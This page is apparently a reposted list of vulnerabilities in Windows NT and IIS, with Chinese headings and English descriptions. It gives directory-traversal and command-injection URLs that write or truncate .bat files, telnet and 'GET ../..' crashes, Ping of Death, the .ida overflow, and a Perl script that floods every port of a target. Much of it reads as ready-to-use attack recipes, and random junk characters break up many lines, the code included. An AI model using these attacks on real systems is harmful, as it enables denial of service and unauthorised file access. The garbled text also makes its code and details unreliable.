NT的漏洞及描述(英文）

受影响系统:4.0,iis 1.0
A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.
. _# P3 u- i* Q/ W3 c
A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.
. n! m6 c4 G2 `% L! ^5 n3 m" @
- X0 `0 i1 c* N0 X1 fBy default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.
9 W$ W- p5 B+ E) D& s5 \
3 P" s5 Z5 f8 B% Q1 U' x: n$ Z--------------------------------------------------------------------

  z3 a5 T; U  W. V受影响系统:4.0
7 e  T7 S3 y6 W5 r4 T9 l. S) uA URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.

& O' j9 p3 G8 B( W' C; R$ ?% Q9 zIf the file 'target.bat' exists, the file will be truncated.


A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.

9 q' o  Z# j, M3 S----------------------------------------------------------------------
$ t  z, C$ I$ R& @, i" e5 R5 g* I4 y
受影响系统:3.51,4.0
$ j+ B* C+ }4 r" n; wMultiple service ports (53, 135, 1031) are vunerable to 'confusion'.

The following steps;

Telnet to an NT 4.0 system on port 135
  @9 N8 P* y$ uType about 10 characters followed by a <CR>
+ u0 R4 t- J1 ^# F' FExit Telnet
results in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.
% _) W; \7 A. [
When launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.
) I) E% q: D) w; h* u" }
The above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.

If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.
2 f; G6 m! f' d  F- l& w  Z
* t# w  _# q+ F4 W5 N( @5 |; @The following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):

/*begin poke code*/

5 U; {7 z- W, U( V0 xuse Socket;
use FileHandle;
require "chat2.pl";

$systemname = $ARGV[0] && shift;
4 ?* r, u* N8 i, o4 Z1 Z
$verbose = 1; # tell me what you're hitting
2 d- v% V. j: P9 Z' r: p1 O% b9 F$knownports = 1; # don't hit known problem ports
; b3 F/ y! z) q9 Sfor ($port = $0; $port<65535; $port++)
{
4 p7 p; ]2 _& k# a! K- [+ o/ E

if ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {
+ g5 ~3 T* E  J" Rnext;
, V/ g! X' V  L" g; G5 M. R}
" |1 R1 d, x8 [+ r( L$fh = chat::open_port($systemname, $port);
chat::print ($fh,"This is about ten characters or more");
) d1 G* F! `0 ^6 N2 nif ($verbose) {
# S- w7 G+ w4 _print "Trying port: $port\n";
}
chat::close($fh);

}

7 [" c4 ^8 n9 U  D! w( p
  q! }$ H, P/ ?6 }2 ^/*end poke code*/
" l! T! a( C% Q  `9 C; C
: S: v# d+ ?9 @' Y0 m0 U. s  \- h( LSave the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername

8 N8 Z% Q* v# X6 C  r7 n--------------------------------------------------------------------------------

受影响系统:4.0
Using a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.
3 j6 _! Q+ O* V5 M
9 d1 w# z3 W3 n2 T0 XThis attack causes Dr. Watson to display an alert window and to log an error:
) L) s9 P$ s. n2 w
! u$ ~0 B- U. _7 b. s"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"
) H/ K# l6 Y: @. j
% ]1 Z& @' G' D- W$ t0 y4 B; z--------------------------------------------------------------------------------

受影响系统:3.51,4.0
Large packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:

7 A& J3 d3 W8 n2 u# Q) ~. {" ]. QSTOP: 0X0000001E
/ v( I+ u0 t* g. MKMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS

-OR-
; M% o% G( Z3 Z
STOP: 0x0000000A
$ F; H: R1 I4 W3 y1 FIRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS

NT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.
, @4 T: x! c- S/ I- I
--------------------------------------------------------------------------------
2 h$ E) C6 Q( q# m
5 k0 Q, l! Z, \Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure).

--------------------------------------------------------
) i0 C) H4 U& w# F
IIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server